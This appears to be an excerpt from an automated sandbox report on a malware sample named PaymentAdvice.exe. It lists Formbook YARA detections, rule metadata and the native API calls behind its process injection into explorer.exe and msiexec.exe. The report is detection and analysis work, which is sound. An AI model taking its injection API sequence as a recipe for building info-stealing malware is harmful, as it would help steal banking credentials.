          Source: explorer.exe, 00000003.00000000.264957707.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
          Source: explorer.exe, 00000003.00000000.264957707.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.tiro.com
          Source: explorer.exe, 00000003.00000000.264957707.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.typography.netD
          Source: explorer.exe, 00000003.00000000.264957707.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.urwpp.deDPlease
          Source: explorer.exe, 00000003.00000000.264957707.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 0_2_00404EA0 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,lstrlenA,GlobalUnlock,SetClipboardData,CloseClipboard,
          Source: PaymentAdvice.exe, 00000000.00000002.237618535.0000000000A9A000.00000004.00000020.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

          E-Banking Fraud:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000002.00000001.233939392.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.493924242.00000000007A0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.277986099.00000000006B0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.277857898.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.237687688.0000000002680000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.492784662.0000000000380000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.494092321.00000000007D0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.278046129.00000000006E0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0.2.PaymentAdvice.exe.2680000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.PaymentAdvice.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.1.PaymentAdvice.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.PaymentAdvice.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.1.PaymentAdvice.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.PaymentAdvice.exe.2680000.1.unpack, type: UNPACKEDPE

          System Summary:

          barindex
          Malicious sample detected (through community Yara rule)Show sources
          Source: 00000002.00000001.233939392.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000001.233939392.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000002.493924242.00000000007A0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000002.493924242.00000000007A0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000002.277986099.00000000006B0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000002.277986099.00000000006B0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000002.277857898.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000002.277857898.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000000.00000002.237687688.0000000002680000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.237687688.0000000002680000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000002.492784662.0000000000380000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000002.492784662.0000000000380000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000002.494092321.00000000007D0000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000002.494092321.00000000007D0000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000002.278046129.00000000006E0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000002.278046129.00000000006E0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0.2.PaymentAdvice.exe.2680000.1.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0.2.PaymentAdvice.exe.2680000.1.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 2.2.PaymentAdvice.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.2.PaymentAdvice.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 2.1.PaymentAdvice.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.1.PaymentAdvice.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 2.2.PaymentAdvice.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.2.PaymentAdvice.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 2.1.PaymentAdvice.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.1.PaymentAdvice.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0.2.PaymentAdvice.exe.2680000.1.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0.2.PaymentAdvice.exe.2680000.1.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Executable has a suspicious name (potential lure to open the executable)Show sources
          Source: PaymentAdvice.exeStatic file information: Suspicious name
          Initial sample is a PE file and has a suspicious nameShow sources
          Source: initial sampleStatic PE information: Filename: PaymentAdvice.exe
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_004181B0 NtCreateFile,
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_00418260 NtReadFile,
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_004182E0 NtClose,
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_00418390 NtAllocateVirtualMemory,
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_004181AB NtCreateFile,
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_00418202 NtReadFile,
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_004182DA NtClose,
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_0041838A NtAllocateVirtualMemory,
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_00A398F0 NtReadVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_00A39860 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_00A39840 NtDelayExecution,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_00A399A0 NtCreateSection,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_00A39910 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_00A39A20 NtResumeThread,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_00A39A00 NtProtectVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_00A39A50 NtCreateFile,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_00A395D0 NtClose,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_00A39540 NtReadFile,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_00A396E0 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_00A39660 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_00A397A0 NtUnmapViewOfSection,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_00A39780 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_00A39FE0 NtCreateMutant,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_00A39710 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_00A398A0 NtWriteVirtualMemory,
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_00A39820 NtEnumerateKey,
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_00A3B040 NtSuspendThread,
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_00A399D0 NtCreateProcessEx,
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_00A39950 NtQueueApcThread,
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_00A39A80 NtOpenDirectoryObject,
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_00A39A10 NtQuerySection,
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_00A3A3B0 NtGetContextThread,
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_00A39B00 NtSetValueKey,
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_00A395F0 NtQueryInformationFile,
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_00A39520 NtWaitForSingleObject,
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_00A3AD30 NtSetContextThread,
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_00A39560 NtWriteFile,
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_00A396D0 NtCreateKey,
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_00A39610 NtEnumerateValueKey,
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_00A39670 NtQueryInformationProcess,
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_00A39650 NtQueryValueKey,
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_00A39730 NtQueryVirtualMemory,
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_00A3A710 NtOpenProcessToken,
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_00A39760 NtOpenProcess,
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_00A39770 NtSetInformationFile,
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_00A3A770 NtOpenThread,
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_1_004181B0 NtCreateFile,
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_1_00418260 NtReadFile,
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_1_004182E0 NtClose,
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_1_00418390 NtAllocateVirtualMemory,
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_1_004181AB NtCreateFile,
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_1_00418202 NtReadFile,
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_1_004182DA NtClose,
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_1_0041838A NtAllocateVirtualMemory,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_04679540 NtReadFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046795D0 NtClose,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_04679660 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_04679650 NtQueryValueKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046796E0 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046796D0 NtCreateKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_04679710 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_04679FE0 NtCreateMutant,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_04679780 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_04679860 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_04679840 NtDelayExecution,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_04679910 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046799A0 NtCreateSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_04679A50 NtCreateFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_04679560 NtWriteFile,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_04679520 NtWaitForSingleObject,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0467AD30 NtSetContextThread,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046795F0 NtQueryInformationFile,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_04679670 NtQueryInformationProcess,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_04679610 NtEnumerateValueKey,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_04679760 NtOpenProcess,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0467A770 NtOpenThread,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_04679770 NtSetInformationFile,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_04679730 NtQueryVirtualMemory,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0467A710 NtOpenProcessToken,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046797A0 NtUnmapViewOfSection,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0467B040 NtSuspendThread,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_04679820 NtEnumerateKey,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046798F0 NtReadVirtualMemory,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046798A0 NtWriteVirtualMemory,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_04679950 NtQueueApcThread,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046799D0 NtCreateProcessEx,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_04679A20 NtResumeThread,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_04679A00 NtProtectVirtualMemory,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_04679A10 NtQuerySection,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_04679A80 NtOpenDirectoryObject,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_04679B00 NtSetValueKey,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0467A3B0 NtGetContextThread,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_003981B0 NtCreateFile,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_00398260 NtReadFile,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_003982E0 NtClose,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_00398390 NtAllocateVirtualMemory,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_003981AB NtCreateFile,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_00398202 NtReadFile,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_003982DA NtClose,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0039838A NtAllocateVirtualMemory,
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 0_2_0040314A EntryPoint,#17,OleInitialize,SHGetFileInfoA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,DeleteFileA,GetCommandLineA,GetModuleHandleA,CharNextA,OleUninitialize,ExitProcess,lstrcatA,CreateDirectoryA,lstrcatA,lstrcatA,DeleteFileA,GetModuleFileNameA,lstrcmpiA,CopyFileA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess,
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 0_2_004046A7
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_0041C006
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_00401030
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_00408C4B
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_00408C50
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_00402D90
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_0041B7A2
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_00402FB0
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_00A220A0
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_00AC20A8
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_00A0B090
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_00AC28EC
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_00ACE824
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_00AB1002
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_00A14120
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_009FF900
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_00AC22AE
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_00A2EBB0
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_00ABDBD2
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_00AC2B28
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_00A0841F
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_00ABD466
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_00A22581
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_00A0D5E0
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_00AC25DD
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_00AC2D07
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_009F0D20
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_00AC1D55
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_00AC2EF7
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_00A16E30
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_00ABD616
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_00AC1FF1
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_1_0041C006
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_1_00401030
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_1_00408C4B
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_1_00408C50
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_1_00402D90
          Source: C:\Windows\explorer.exeCode function: 3_2_070A2302
          Source: C:\Windows\explorer.exeCode function: 3_2_0709F902
          Source: C:\Windows\explorer.exeCode function: 3_2_070A0362
          Source: C:\Windows\explorer.exeCode function: 3_2_070A65B2
          Source: C:\Windows\explorer.exeCode function: 3_2_070A57C7
          Source: C:\Windows\explorer.exeCode function: 3_2_070A4062
          Source: C:\Windows\explorer.exeCode function: 3_2_0709F8F9
          Source: C:\Windows\explorer.exeCode function: 3_2_070A22FF
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046FD466
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0464841F
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_04701D55
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_04630D20
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_04702D07
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0464D5E0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_047025DD
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_04662581
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_04656E30
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046FD616
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_04702EF7
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_04701FF1
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046F1002
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_047028EC
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046620A0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_047020A8
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0464B090
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_04654120
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0463F900
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_047022AE
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_04702B28
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046FDBD2
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0466EBB0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_00388C50
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_00388C4B
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_00382D90
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_00382FB0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: String function: 0463B150 appears 35 times
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: String function: 009FB150 appears 35 times
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: String function: 00419F60 appears 38 times
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: String function: 0041A090 appears 38 times
          Source: PaymentAdvice.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: PaymentAdvice.exe, 00000000.00000003.233898045.000000001F21F000.00000004.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs PaymentAdvice.exe
          Source: PaymentAdvice.exe, 00000002.00000002.278186633.000000000096F000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamemsiexec.exeX vs PaymentAdvice.exe
          Source: PaymentAdvice.exe, 00000002.00000002.278485977.0000000000C7F000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs PaymentAdvice.exe
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dll
          Source: PaymentAdvice.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
          Source: 00000002.00000001.233939392.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000001.233939392.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000002.493924242.00000000007A0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000002.493924242.00000000007A0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000002.277986099.00000000006B0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000002.277986099.00000000006B0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000002.277857898.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000002.277857898.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
